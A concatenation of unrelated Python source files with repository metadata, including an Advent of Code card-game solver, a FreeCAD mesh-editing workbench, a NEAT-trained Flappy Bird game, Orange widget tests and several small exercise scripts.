        decks["Player 1"].append(p2_card)
    elif p2_card > p1_card:
        decks["Player 2"].append(p2_card)
        decks["Player 2"].append(p1_card)
    return decks, history
def simulate_standard_game(decks: dict) -> dict:
    """
    Simulates a standard game of 'Combat' by running rounds until one of the players
    holds all of the cards.

    Args:
        decks: A dict containing each player's starting deck

    Returns:
        A dict with the winner's name under "player" and their deck under
        "deck".  (Annotation corrected: this never returned a bare deque.)
    """
    while len(decks["Player 1"]) > 0 and len(decks["Player 2"]) > 0:
        decks = simulate_round(decks)
    for player, deck in decks.items():
        if deck:
            return {"player": player, "deck": deck}
def simulate_recursive_game(decks: dict) -> dict:
    """
    Simulates a full game of 'Recursive Combat' (used both for the top-level
    game and for sub-games spawned by simulate_recursive_round).

    Args:
        decks: A dict containing each player's starting deck

    Returns:
        A dict with the winner's name under "player" and their deck under
        "deck".  (Annotation corrected: this never returned a bare deque.)
    """
    history = []
    while len(decks["Player 1"]) > 0 and len(decks["Player 2"]) > 0:
        decks, history = simulate_recursive_round(decks, history)
    for player, deck in decks.items():
        if deck:
            return {"player": player, "deck": deck}
def calculate_score(winner_deck: deque) -> int:
    """
    Score the winning deck: each card is multiplied by its position counted
    from the bottom of the deck (bottom card = 1) and the products summed.

    Note: consumes (empties) *winner_deck*, exactly like the original.

    Args:
        winner_deck: The winner's remaining cards, top card first.

    Returns:
        The winner's score as an int.
    """
    score = 0
    position = 1
    while winner_deck:
        score += winner_deck.pop() * position
        position += 1
    return score
def part_one(file_input: list) -> int:
    """Score the winner of a standard game of Combat built from *file_input*."""
    decks = create_decks(file_input)
    winner = simulate_standard_game(decks)
    winner_deck = winner["deck"]
    return calculate_score(winner_deck)
def part_two(file_input: list) -> int:
    """Score the winner of a game of Recursive Combat built from *file_input*."""
    decks = create_decks(file_input)
    winner_deck = simulate_recursive_game(decks)["deck"]
    return calculate_score(winner_deck)
# Entry point: read the day-22 puzzle input and print both answers.
if __name__ == "__main__":
    INPUT = read_input(22)
    # INPUT = TEST_INPUT
    print(part_one(INPUT))
    print(part_two(INPUT))
| ericrochow/AoC_20 | solutions/day22.py | day22.py | py | 4,921 | python | en | code | 1 | github-code | 90 |
25663613806 | target = int(input())
# Brute-force two-sum: print the index pair (i, j), i < j, of every pair
# of numbers that adds up to `target`.  O(n^2) over the input list.
arr = input("")
num = [int(n) for n in arr.split()]
n = len(num)
for i in range(n):
    for j in range(i + 1, n):
        a= num[i]
        b= num[j]
        if a + b == target:
            print(i,j)
print(i,j)
| lyj-zhanghong/lecode1 | main.py | main.py | py | 223 | python | en | code | 0 | github-code | 90 |
18583983189 | N,A,B=input().split()
# Sum every integer i in 0..N whose decimal digit sum lies in [A, B].
# NOTE: `sum` shadows the builtin of the same name for the rest of the script.
sum=0
for i in range(int(N)+1):
    nums = list(str(i))
    tmp = 0
    # tmp = digit sum of i
    for j in nums:
        tmp = tmp + int(j)
    if int(A)<=tmp:
        if tmp<=int(B):
            sum = sum + i
print(sum)
| Aasthaengg/IBMdataset | Python_codes/p03478/s057299295.py | s057299295.py | py | 218 | python | en | code | 0 | github-code | 90 |
2026817985 | import FreeCAD
import FreeCADGui
from pivy import coin
import os
class AddTriangle:
    """FreeCAD GUI command that adds a facet to the selected mesh surface."""

    def __init__(self):
        folder = os.path.dirname(__file__)
        self.Path = folder
        self.resources = {
            'Pixmap': folder + '/../Resources/Icons/EditSurface.svg',
            'MenuText': "Add Triangle",
            'ToolTip': "Add a triangle to selected surface."
        }

    def GetResources(self):
        """Return the command resources dictionary."""
        return self.resources

    def Activated(self):
        """Delegate to the built-in Mesh 'add facet' command."""
        FreeCADGui.runCommand("Mesh_AddFacet")
FreeCADGui.addCommand('Add Triangle', AddTriangle())
class DeleteTriangle:
    """FreeCAD GUI command that removes facets from the selected mesh surface."""

    def __init__(self):
        folder = os.path.dirname(__file__)
        self.Path = folder
        self.resources = {
            'Pixmap': folder + '/../Resources/Icons/EditSurface.svg',
            'MenuText': "Delete Triangle",
            'ToolTip': "Delete triangles from selected surface."
        }

    def GetResources(self):
        """Return the command resources dictionary."""
        return self.resources

    @staticmethod
    def Activated():
        """Delegate to the built-in Mesh 'remove components' command."""
        FreeCADGui.runCommand("Mesh_RemoveComponents")
FreeCADGui.addCommand('Delete Triangle', DeleteTriangle())
class SwapEdge:
    """FreeCAD GUI command that swaps the shared edge of two picked mesh facets.

    Activating the command installs a pivy mouse-button callback; the user
    left-clicks two facets to swap their common edge.  A right-click
    removes the callback.
    """
    def __init__(self):
        self.Path = os.path.dirname(__file__)
        self.resources = {
            'Pixmap': self.Path + '/../Resources/Icons/EditSurface.svg',
            'MenuText': "Swap Edge",
            'ToolTip': "Swap Edge of selected surface."
        }

    def GetResources(self):
        # Return the command resources dictionary
        return self.resources

    def Activated(self):
        """Install the mouse callback and reset the facet-pick buffer."""
        self.FaceIndexes = []
        self.MC = FreeCADGui.ActiveDocument.ActiveView.addEventCallbackPivy(
            coin.SoMouseButtonEvent.getClassTypeId(), self.SwapEdge)

    def SwapEdge(self, cb):
        """Mouse callback: collect two facet picks, then swap their edge."""
        event = cb.getEvent()
        # Right mouse button: uninstall the callback and stop the tool.
        if event.getButton() == coin.SoMouseButtonEvent.BUTTON2 \
                and event.getState() == coin.SoMouseButtonEvent.DOWN:
            FreeCADGui.ActiveDocument.ActiveView.removeEventCallbackPivy(
                coin.SoMouseButtonEvent.getClassTypeId(), self.MC)
        # Left mouse button: record the picked facet index.
        if event.getButton() == coin.SoMouseButtonEvent.BUTTON1 \
                and event.getState() == coin.SoMouseButtonEvent.DOWN:
            pp = cb.getPickedPoint()
            if pp is not None:
                detail = pp.getDetail()
                if detail.isOfType(coin.SoFaceDetail.getClassTypeId()):
                    face_detail = coin.cast(
                        detail, str(detail.getTypeId().getName()))
                    index = face_detail.getFaceIndex()
                    self.FaceIndexes.append(index)
                    if len(self.FaceIndexes) == 2:
                        # Work on a copy so a failed swap leaves the
                        # document mesh untouched.
                        surface = FreeCADGui.Selection.getSelection()[-1]
                        CopyMesh = surface.Mesh.copy()
                        try:
                            CopyMesh.swapEdge(
                                self.FaceIndexes[0], self.FaceIndexes[1])
                        except Exception:
                            # swapEdge raises when the facets share no edge.
                            # Previously a bare `except:` which also swallowed
                            # KeyboardInterrupt/SystemExit.
                            pass
                        surface.Mesh = CopyMesh
                        self.FaceIndexes.clear()
FreeCADGui.addCommand('Swap Edge', SwapEdge())
class SmoothSurface:
    """FreeCAD GUI command that smooths the currently selected mesh surface."""

    def __init__(self):
        folder = os.path.dirname(__file__)
        self.Path = folder
        self.resources = {
            'Pixmap': folder + '/../Resources/Icons/EditSurface.svg',
            'MenuText': "Smooth Surface",
            'ToolTip': "Smooth selected surface."
        }

    def GetResources(self):
        """Return the command resources dictionary."""
        return self.resources

    @staticmethod
    def Activated():
        """Smooth the mesh of the first selected object in place."""
        selected = FreeCADGui.Selection.getSelection()[0]
        selected.Mesh.smooth()
FreeCADGui.addCommand('Smooth Surface', SmoothSurface())
| GitHub-XK/FreeCAD-Geomatics-Workbench | Surfaces/EditSurface.py | EditSurface.py | py | 3,819 | python | en | code | 0 | github-code | 90 |
32420595365 | '''
Practice Project: Teaching an AI to Play Flappy Bird using an Evolutionary Algorithm
Watts Dietrich
Nov 9 2020
In this practice project, the evolutionary AI algorithm called NEAT (NeuroEvolution of Augmenting Topologies)
is used to teach an AI to play the game "Flappy Bird." See the readme for more info.
'''
import pygame
import neat
import time
import os
import random
pygame.font.init()
# Set window size
WIN_WIDTH = 500
WIN_HEIGHT = 800
# Get images
BIRD_IMGS = [pygame.transform.scale2x(pygame.image.load(os.path.join("imgs", "bird1.png"))),
pygame.transform.scale2x(pygame.image.load(os.path.join("imgs", "bird2.png"))),
pygame.transform.scale2x(pygame.image.load(os.path.join("imgs", "bird3.png")))]
PIPE_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs", "pipe.png")))
BASE_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs", "base.png")))
BG_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs", "bg.png")))
# Font for the score
STAT_FONT = pygame.font.SysFont("comicsans", 50)
GEN = 0
class Bird:
    """The player sprite: position, velocity, tilt and animation state."""
    # Define some constants
    IMGS = BIRD_IMGS
    MAX_ROTATION = 25 # This defines the max degrees that the bird image can rotate while going up or down
    ROT_VEL = 20 # Rotation velocity: how much the bird can rotate per frame of animation
    ANIMATION_TIME = 5 # How long each animation will take
    def __init__(self, x, y):
        """Create a bird at pixel position (x, y)."""
        # Define initial conditions of the bird
        self.x = x
        self.y = y
        self.tilt = 0
        self.tick_count = 0
        self.vel = 0
        self.height = self.y
        self.img_count = 0
        self.img = self.IMGS[0]
    # jump() is what happens when the bird jumps upward
    def jump(self):
        """Give the bird an upward impulse and restart the jump clock."""
        self.vel = -10.5 # Note: in pygame, the top-left window corner is (0,0), so to go up, a negative vel is needed
        self.tick_count = 0 # Reset the counter that keeps track of when the last jump occurred
        self.height = self.y # The starting height of the jump
    # move() is called each frame to move the bird
    def move(self):
        """Advance one frame of ballistic motion and update the tilt."""
        self.tick_count += 1 # increment the tick_count (time since last jump)
        # Calculate displacement d, the number of pixels up or down the bird will move this frame
        d = self.vel * self.tick_count + 1.5 * self.tick_count**2
        # Set terminal velocity
        if d >= 16:
            d = 16
        # This is a tuning mechanism. Fiddle with this to change the overall height of a jump
        if d < 0:
            d -= 2
        # Update y position based on calculated displacement
        self.y = self.y + d
        # Tilt the bird according to movement
        if d < 0 or self.y < self.height + 50:
            # moving up (or just below jump start): pitch the nose up
            if self.tilt < self.MAX_ROTATION:
                self.tilt = self.MAX_ROTATION
        else:
            # falling: gradually rotate down to a nose-dive (-90 degrees)
            if self.tilt > -90:
                self.tilt -= self.ROT_VEL
    # Draw the bird.
    def draw(self, win):
        """Draw the bird on *win*, cycling wing-flap frames and applying tilt."""
        self.img_count += 1 # increment image counter
        # Choose bird image based on image counter, animation time, cycle back and forth through the images
        if self.img_count <= self.ANIMATION_TIME:
            self.img = self.IMGS[0]
        elif self.img_count <= self.ANIMATION_TIME*2:
            self.img = self.IMGS[1]
        elif self.img_count <= self.ANIMATION_TIME*3:
            self.img = self.IMGS[2]
        elif self.img_count <= self.ANIMATION_TIME*4:
            self.img = self.IMGS[1]
        elif self.img_count == self.ANIMATION_TIME*5:
            self.img = self.IMGS[0]
            self.img_count = 0 # reset image counter
        # If the bird is diving hard, display just bird2.png, so it looks like it's gliding
        if self.tilt <= -80:
            self.img = self.IMGS[1]
            self.img_count = self.ANIMATION_TIME*2
        # Rotate image about its center based on current tilt
        rotated_image = pygame.transform.rotate(self.img, self.tilt)
        new_rect = rotated_image.get_rect(center = self.img.get_rect(topleft = (self.x, self.y)).center)
        win.blit(rotated_image, new_rect.topleft)
    # This returns info needed for collision detection
    def get_mask(self):
        """Return the pygame mask of the current frame for pixel-perfect collisions."""
        return pygame.mask.from_surface(self.img)
class Pipe:
    """A pair of pipes (top + bottom) with a fixed-size gap between them."""
    GAP = 200 # The space between pipes
    VEL = 5 # How fast the pipes move
    def __init__(self, x):
        """Create a pipe pair at horizontal position x with a random gap height."""
        self.x = x
        self.height = 0
        self.gap = 100 # Gap size  # NOTE(review): unused -- the class constant GAP is what set_height uses
        self.top = 0 # Will store position where top of pipe will be drawn
        self.bottom = 0 # Will store position where bottom of pipe will be drawn
        self.PIPE_TOP = pygame.transform.flip(PIPE_IMG, False, True)
        self.PIPE_BOTTOM = PIPE_IMG
        self.passed = False # When bird passes the pipe, this is set to True
        self.set_height()
    def set_height(self):
        """Randomize the vertical gap position and derive the draw anchors."""
        self.height = random.randrange(50, 450) # Height is the top of the gap
        self.top = self.height - self.PIPE_TOP.get_height() # Top is the top-left corner of the pipe image
        self.bottom = self.height + self.GAP # Bottom is the bottom of the gap
    def move(self):
        """Scroll the pipe left by VEL pixels (one frame)."""
        self.x -= self.VEL
    def draw(self, win):
        """Blit both pipe halves onto *win*."""
        win.blit(self.PIPE_TOP, (self.x, self.top))
        win.blit(self.PIPE_BOTTOM, (self.x, self.bottom))
    # Collision detection
    # Uses pygame masks to determine if drawn pixels are colliding
    def collide(self, bird):
        """Return True when *bird* overlaps either pipe half (pixel-perfect)."""
        bird_mask = bird.get_mask()
        top_mask = pygame.mask.from_surface(self.PIPE_TOP)
        bottom_mask = pygame.mask.from_surface(self.PIPE_BOTTOM)
        # Offsets of each pipe mask relative to the bird mask
        top_offset = (self.x - bird.x, self.top - round(bird.y))
        bottom_offset = (self.x - bird.x, self.bottom - round(bird.y))
        # Get collision points, if any. These are set to None if no collision
        b_point = bird_mask.overlap(bottom_mask, bottom_offset)
        t_point = bird_mask.overlap(top_mask, top_offset)
        # Check for collision
        if t_point or b_point:
            return True
        return False
# The Base class uses cycles two images of the ground through the canvas to create the illusion of movement
class Base:
    """Scrolling ground: two copies of the ground image cycled endlessly."""
    VEL = 5
    WIDTH = BASE_IMG.get_width()
    IMG = BASE_IMG
    def __init__(self, y):
        """Create the ground at vertical position y."""
        self.y = y
        self.x1 = 0 # position of the 1st image
        self.x2 = self.WIDTH # position of the 2nd image
    def move(self):
        """Scroll both copies left; recycle whichever leaves the screen."""
        self.x1 -= self.VEL
        self.x2 -= self.VEL
        # If 1st image scrolls off the screen, cycles it back behind the 2nd image
        if self.x1 + self.WIDTH <0:
            self.x1 = self.x2 + self.WIDTH
        if self.x2 + self.WIDTH <0:
            self.x2 = self.x1 + self.WIDTH
    def draw(self, win):
        """Blit both ground copies onto *win*."""
        win.blit(self.IMG, (self.x1, self.y))
        win.blit(self.IMG, (self.x2, self.y))
def draw_window(win, birds, pipes, base, score, gen, living):
    """Render one frame: background, pipes, HUD (score/gen/bird count), ground, birds."""
    # Note that blit() simply draws something on the screen
    # Draw the background
    win.blit(BG_IMG, (0,0))
    # Draw pipes
    for pipe in pipes:
        pipe.draw(win)
    # Draw score (top-right)
    text = STAT_FONT.render("Score: " + str(score), 1, (255,255,255))
    win.blit(text, (WIN_WIDTH - 10 - text.get_width(), 10))
    # Display generation count (top-left)
    text = STAT_FONT.render("Gen: " + str(gen), 1, (255, 255, 255))
    win.blit(text, (10, 10))
    # Display number of living birds
    text = STAT_FONT.render("Birds: " + str(living), 1, (255, 255, 255))
    win.blit(text, (10, 50))
    # Draw base
    base.draw(win)
    # Draw bird
    for bird in birds:
        bird.draw(win)
    pygame.display.update()
# This main() function doubles as the fitness function that is passed to the NEAT algorithm in run() below
def main(genomes, config):
    """NEAT fitness function: run one generation's birds through the game.

    Each genome controls one bird; fitness accrues for surviving frames
    and passed pipes, and drops on collision.  The function returns when
    every bird has died (or the window is closed).
    """
    global GEN
    GEN += 1
    nets = [] # Stores the neural networks for each bird
    ge = [] # Stores the genomes for each bird
    birds = [] # Stores info specific to each bird
    # Initialize all neural networks, genomes, birds
    for _, g in genomes:
        net = neat.nn.FeedForwardNetwork.create(g, config)
        nets.append(net)
        birds.append(Bird(230,350))
        g.fitness = 0
        ge.append(g)
    base = Base(730)
    pipes = [Pipe(600)]
    win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))
    clock = pygame.time.Clock()
    score = 0
    run = True
    while run:
        clock.tick(30)
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                run = False
                pygame.quit()
                quit()
        # Need to ensure birds move according to next pipe, ignore passed pipes
        pipe_ind = 0
        if len(birds) > 0:
            if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].PIPE_TOP.get_width():
                pipe_ind = 1
        else:
            # no birds left: generation over
            run = False
            break
        for x, bird in enumerate(birds):
            bird.move()
            ge[x].fitness += 0.1 # Increase fitness slightly for moving forward
            # Get neural network output (inputs: bird height, distances to gap edges)
            output = nets[x].activate((bird.y, abs(bird.y - pipes[pipe_ind].height), abs(bird.y - pipes[pipe_ind].bottom)))
            # Get birds to jump when the network tells them to
            if output[0] > 0.5:
                bird.jump()
        add_pipe = False
        rem = [] # This stores pipes to be removed
        # Remove birds that collide and their associated genomes, networks
        # NOTE(review): popping from birds/nets/ge while enumerating mutates the
        # list mid-iteration and can skip the next bird for this pipe -- verify.
        for pipe in pipes:
            for x, bird in enumerate(birds):
                if pipe.collide(bird):
                    ge[x].fitness -= 1
                    birds.pop(x)
                    nets.pop(x)
                    ge.pop(x)
                # Once the bird passes a pipe, call for a new pipe to be generated
                if not pipe.passed and pipe.x < bird.x:
                    pipe.passed = True
                    add_pipe = True
            # Remove pipes as they leave the screen
            if pipe.x + pipe.PIPE_TOP.get_width() < 0:
                rem.append(pipe)
            pipe.move()
        # Make a new pipe and increment score
        if add_pipe:
            score += 1
            # Increase fitness for surviving birds
            for g in ge:
                g.fitness += 5
            pipes.append(Pipe(600))
        # Remove old pipes
        for r in rem:
            pipes.remove(r)
        # If bird hits the ground, or flies off top of screen, remove it
        for x, bird in enumerate(birds):
            if bird.y + bird.img.get_height() >= 730 or bird.y < 0:
                birds.pop(x)
                nets.pop(x)
                ge.pop(x)
        base.move()
        living = len(birds)
        draw_window(win, birds, pipes, base, score, GEN, living)
def run(config_path):
    """Load the NEAT config and evolve a population for up to 50 generations,
    using main() as the fitness function."""
    config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet,
                                neat.DefaultStagnation, config_path)
    # Generate a population
    p = neat.Population(config)
    # Output statistics to stdout after each generation
    p.add_reporter(neat.StdOutReporter(True))
    stats = neat.StatisticsReporter()
    p.add_reporter(stats)
    # Determine winners using fitness function
    winner = p.run(main, 50)
# Entry point: resolve the NEAT config file next to this script and run.
if __name__ == "__main__":
    local_dir = os.path.dirname(__file__)
    config_path = os.path.join(local_dir, "config-feedforward.txt")
    run(config_path)
| TerraWatts/AI-FlappyBird | FlappyBird.py | FlappyBird.py | py | 11,382 | python | en | code | 0 | github-code | 90 |
37431938854 | import pygame, os, random,pygame.font
# Memory (pairs) game: a 4x3 grid of face-down cards; click two cards to
# reveal them, matching pairs stay revealed.
pygame.init()
gameWidth = 840
gameHeight = 640
picSize = 128
gameColumns = 4
gameRows = 3
padding = 10
# Center the grid inside the window.
leftMargin = (gameWidth - ((picSize + padding) * gameColumns)) // 2
rightMargin = leftMargin
topMargin = (gameHeight - ((picSize + padding) * gameRows)) // 2
bottomMargin = topMargin
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
# Indices (into the card lists) of the first and second card of the
# current guess; None while not selected.
selection1 = None
selection2 = None
# Create the game window
screen = pygame.display.set_mode((gameWidth, gameHeight))
pygame.display.set_caption('Memory Game')
# Build the list of image names (file name without extension), duplicated
# once so each picture appears exactly twice, then shuffled.
memoryPictures = []
for item in os.listdir('images/'):
    memoryPictures.append(item.split('.')[0])
memoryPicturesCopy = memoryPictures.copy()
memoryPictures.extend(memoryPicturesCopy)
memoryPicturesCopy.clear()
random.shuffle(memoryPictures)
# Load and scale the images; one rect + one hidden-flag per card.
memPics = []
memPicsRect = []
hiddenImages = []
for item in memoryPictures:
    picture = pygame.image.load(f'images/{item}.png')
    picture = pygame.transform.scale(picture, (picSize, picSize))
    memPics.append(picture)
    pictureRect = picture.get_rect()
    memPicsRect.append(pictureRect)
# Place the cards on the grid.  NOTE(review): the row uses i % gameRows
# (not i // gameColumns), which fills the grid along diagonals; each cell
# is still hit exactly once, but ONLY because gcd(gameColumns, gameRows)
# = gcd(4, 3) = 1 -- changing the grid size can make cards overlap.
for i in range(len(memPicsRect)):
    memPicsRect[i][0] = leftMargin + ((picSize + padding) * (i % gameColumns))
    memPicsRect[i][1] = topMargin + ((picSize + padding) * (i % gameRows))
    hiddenImages.append(False)
print(memoryPictures)
print(memPics)
print(memPicsRect)
print(hiddenImages)
gameLoop = True
while gameLoop:
    # Handle quit and left-click card selection.
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            gameLoop = False
        if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
            for item in memPicsRect:
                if item.collidepoint(event.pos):
                    if hiddenImages[memPicsRect.index(item)] != True:
                        if selection1 != None:
                            selection2 = memPicsRect.index(item)
                            hiddenImages[selection2] = True
                        else:
                            selection1 = memPicsRect.index(item)
                            hiddenImages[selection1] = True
    # Draw every card: revealed ones show their picture, hidden ones a white square.
    for i in range(len(memoryPictures)):
        if hiddenImages[i] == True:
            screen.blit(memPics[i], memPicsRect[i])
        else:
            pygame.draw.rect(screen, WHITE, (memPicsRect[i][0], memPicsRect[i][1], picSize, picSize))
    pygame.display.update()
    # Evaluate the current guess: a mismatch is shown for 1 second, then re-hidden.
    if selection1 != None and selection2 != None:
        if memoryPictures[selection1] == memoryPictures[selection2]:
            selection1, selection2 = None, None
        else:
            pygame.time.wait(1000)
            hiddenImages[selection1] = False
            hiddenImages[selection2] = False
            selection1, selection2 = None, None
    # Win check: product of the per-card flags is 1 only when all are revealed.
    win = 1
    for number in range(len(hiddenImages)):
        win *= hiddenImages[number]
    if win == 1:
        gameLoop = False
    pygame.display.update()
pygame.quit() | XaviLami/python_learn | jeux.py | jeux.py | py | 2,935 | python | en | code | 0 | github-code | 90
18109695839 | n,q = [int(s) for s in input().split()]
# Round-robin scheduling with quantum q: each process runs at most q time
# units, then goes to the back of the queue; print "name finish_time" when
# a process completes.
queue = []
for i in range(n):
    name,time = input().split()
    queue.append([name,int(time)])
time = 0
while queue:
    # NOTE: list.pop(0) is O(n); collections.deque.popleft() would be O(1).
    processing = queue.pop(0)
    t = min(processing[1], q)
    time += t
    processing[1] -= t
    if processing[1] == 0:
        print(processing[0],time)
    else:
        queue.append(processing) | Aasthaengg/IBMdataset | Python_codes/p02264/s368571736.py | s368571736.py | py | 324 | python | en | code | 0 | github-code | 90
35225767719 | # pylint: disable=missing-docstring,protected-access
from AnyQt.QtCore import Qt
from AnyQt.QtWidgets import QApplication
from Orange.data import Table
from Orange.widgets.tests.base import WidgetTest, WidgetOutputsTestMixin
from Orange.classification import CN2Learner
from Orange.widgets.visualize.owruleviewer import OWRuleViewer
class TestOWRuleViewer(WidgetTest, WidgetOutputsTestMixin):
    """GUI tests for the Rule Viewer widget: input handling, selection ->
    filtered-data output, clipboard copy, sorting, and the compact view."""
    @classmethod
    def setUpClass(cls):
        """Build one shared CN2 classifier over titanic for all tests."""
        super().setUpClass()
        WidgetOutputsTestMixin.init(cls)
        cls.titanic = Table('titanic')
        cls.learner = CN2Learner()
        cls.classifier = cls.learner(cls.titanic)
        # CN2Learner does not add `instances` attribute to the model, but
        # the Rules widget does. We simulate the model we get from the widget.
        cls.classifier.instances = cls.titanic
        cls.signal_name = OWRuleViewer.Inputs.classifier
        cls.signal_data = cls.classifier
        cls.data = cls.titanic
    def setUp(self):
        # Fresh widget per test.
        self.widget = self.create_widget(OWRuleViewer)
    def test_set_data(self):
        # data must be None before assignment
        self.assertIsNone(self.widget.data)
        self.assertIsNone(self.get_output(self.widget.Outputs.selected_data))
        # assign None data
        self.send_signal(self.widget.Inputs.data, None)
        self.assertIsNone(self.widget.data)
        self.assertIsNone(self.get_output(self.widget.Outputs.selected_data))
        # assign data
        self.send_signal(self.widget.Inputs.data, self.titanic)
        self.assertEqual(self.titanic, self.widget.data)
        # output signal should not be sent without a classifier
        self.assertIsNone(self.get_output(self.widget.Outputs.selected_data))
        # remove data
        self.send_signal(self.widget.Inputs.data, None)
        self.assertIsNone(self.widget.data)
        self.assertIsNone(self.get_output(self.widget.Outputs.selected_data))
    def test_set_classifier(self):
        # classifier must be None before assignment
        self.assertIsNone(self.widget.data)
        self.assertIsNone(self.widget.classifier)
        self.assertIsNone(self.widget.selected)
        # assign the classifier
        self.send_signal(self.widget.Inputs.classifier, self.classifier)
        self.assertIsNone(self.widget.data)
        self.assertIsNotNone(self.widget.classifier)
        self.assertIsNone(self.widget.selected)
        # without data also set, the output should be None
        self.assertIsNone(self.get_output(self.widget.Outputs.selected_data))
    def test_filtered_data_output(self):
        self.send_signal(self.widget.Inputs.data, self.titanic)
        self.send_signal(self.widget.Inputs.classifier, self.classifier)
        # select the last rule (TRUE)
        selection_model = self.widget.view.selectionModel()
        selection_model.select(
            self.widget.proxy_model.index(
                len(self.classifier.rule_list) - 1, 0),
            selection_model.Select | selection_model.Rows)
        # the number of output data instances (filtered)
        # must match the size of titanic data-set
        output = self.get_output(self.widget.Outputs.selected_data)
        self.assertEqual(len(self.titanic), len(output))
        # clear selection,
        selection_model.clearSelection()
        # output should now be None
        self.assertIsNone(self.get_output(self.widget.Outputs.selected_data))
    def test_copy_to_clipboard(self):
        self.send_signal(self.widget.Inputs.classifier, self.classifier)
        # select the last rule (TRUE)
        selection_model = self.widget.view.selectionModel()
        selection_model.select(
            self.widget.proxy_model.index(
                len(self.classifier.rule_list) - 1, 0),
            selection_model.Select | selection_model.Rows)
        # copy the selection and test if correct
        self.widget.copy_to_clipboard()
        clipboard_contents = QApplication.clipboard().text()
        self.assertTrue(self.classifier.rule_list[-1].__str__() ==
                        clipboard_contents)
    def test_restore_original_order(self):
        self.send_signal(self.widget.Inputs.classifier, self.classifier)
        bottom_row = len(self.classifier.rule_list) - 1
        # sort the table
        self.widget.proxy_model.sort(0, Qt.AscendingOrder)
        # bottom row QIndex
        q_index = self.widget.proxy_model.index(bottom_row, 0)
        self.assertEqual(bottom_row, q_index.row())
        # translate to TableModel QIndex
        q_index = self.widget.proxy_model.mapToSource(q_index)
        # the row indices do NOT match
        self.assertNotEqual(bottom_row, q_index.row())
        # restore original order
        self.widget.restore_original_order()
        # repeat the process
        q_index = self.widget.proxy_model.index(bottom_row, 0)
        self.assertEqual(bottom_row, q_index.row())
        # translate to TableModel QIndex
        q_index = self.widget.proxy_model.mapToSource(q_index)
        # the row indices now match
        self.assertEqual(bottom_row, q_index.row())
    def test_selection_compact_view(self):
        self.send_signal(self.widget.Inputs.classifier, self.classifier)
        # test that selection persists through view change
        selection_model = self.widget.view.selectionModel()
        selection_model.select(self.widget.proxy_model.index(0, 0),
                               selection_model.Select | selection_model.Rows)
        self.widget._save_selected(actual=True)
        temp = self.widget.selected
        # update (compact view)
        self.widget.on_update()
        self.widget._save_selected(actual=True)
        # test that the selection persists
        self.assertEqual(temp, self.widget.selected)
    def _select_data(self):
        # Helper for WidgetOutputsTestMixin: select row 2 and return the
        # expected instance indices.
        selection_model = self.widget.view.selectionModel()
        selection_model.select(self.widget.proxy_model.index(2, 0),
                               selection_model.Select | selection_model.Rows)
        return list(range(586, 597))
| biolab/orange3 | Orange/widgets/visualize/tests/test_owruleviewer.py | test_owruleviewer.py | py | 6,069 | python | en | code | 4,360 | github-code | 90 |
43441834717 | import csv
import pathlib
root = pathlib.Path(__file__).parent
files_path = root.joinpath("files")
# citire fisier csv
try:
with open(files_path.joinpath("salarii.csv")) as fin:
reader = list(csv.reader(fin))
except OSError:
print("File error.")
else:
lista_salarii = []
for i in reader:
lista_salarii.append(float(i[3]))
print(f"Total salarii: {sum(lista_salarii)}")
# citire fisier csv cu nume campuri
# field_names = [
# "first_name",
# "last_name",
# "id",
# "gros_salary",
# "days_off"
# ]
# try:
# with open(files_path.joinpath("salarii.csv")) as fin:
# # list -> extrage datele din generator
# dict_reader = list(csv.DictReader(fin, fieldnames=field_names))
# for i in dict_reader:
# print(i)
# except OSError:
# print("File error.")
# scriere csv
try:
with open(files_path.joinpath("bonuri.csv"), "w") as fout:
csv_writer = csv.writer(fout, lineterminator='\n')
for i in reader:
bonuri = 20 - int(i[4])
valoare_bonuri = bonuri * 20
zile_libere = int(i[4])
csv_writer.writerow([i[0], i[1], bonuri, valoare_bonuri])
except OSError:
print("File write error.")
# csv.DictWriter - get a dict for each line
# un bon costa 20 de lei
# 20 de zile lucratoare toate | tohhhi/it_school_2022 | Sesiunea 22/practice.py | practice.py | py | 1,360 | python | en | code | 0 | github-code | 90 |
43033298957 | # Dynamic Programming minimum coin sum #
def minCoins(coins, sum):
    """Return the minimum number of coins from `coins` needed to make `sum`.

    Classic bottom-up DP.  Unreachable amounts keep the sentinel value
    sum + 100 (the original's "infinity"), which is what gets returned for
    them.  Note: the second parameter shadows the builtin ``sum``; the name
    is kept for interface compatibility with existing callers.
    """
    sentinel = sum + 100  # larger than any real coin count for this sum
    best = [sentinel] * (sum + 1)
    best[0] = 0  # zero coins make amount 0
    for amount in range(1, sum + 1):
        for coin in coins:
            if coin <= amount and best[amount - coin] + 1 < best[amount]:
                best[amount] = best[amount - coin] + 1
    return best[sum]
coins = list(map(int,input().split(" ")))
sum = int(input())
print(minCoins(coins,sum))
| kaustav1808/competitive-programming | TopCoder/DPMinCoinSum.py | DPMinCoinSum.py | py | 383 | python | en | code | 0 | github-code | 90 |
34385422327 | import numpy as np
import math
#The Modell for the 2D Jensen shannonn data
class Model_2D:
    def __init__(
        self,
        is_data: bool,
        size: int,
        sample_size: int = 2000,
    ):
        """Build a 2D exponential-background histogram model.

        Args:
            is_data: when True the model represents data (no systematic
                variations are generated and sample() refuses to run).
            size: number of background events to draw.
            sample_size: number of toy variations per systematic.
        """
        # Constant parameters
        self.num_syst = 1
        self.sample_size = sample_size
        # Histogram binning / range
        self.nbins = 5
        self.x_min = 0
        self.x_max = 60
        self.y_min = 0
        self.y_max = 60
        # Background Model: exponential scale parameter for both axes
        self.beta = 10
        # Model specific
        self.is_data = is_data
        self.size = size
        # self.signal_size = signal_size
        # if self.signal_size >= self.size:
        #     raise ValueError(
        #         f"ERROR: Invalid signal size ({self.signal_size}). Should be < background size ({self.size})."
        #     )
        # self.background_fraction = 1.0 - self.signal_fraction
        # self.signal_size = math.floor(self.size * self.signal_fraction)
        self.background_size = self.size
        # Assume uncorrelated and identical exponential background on X and Y
        X = np.random.exponential(self.beta, self.background_size)
        Y = np.random.exponential(self.beta, self.background_size)
        # Build the model: 2D histogram of event counts (transposed so rows = y bins)
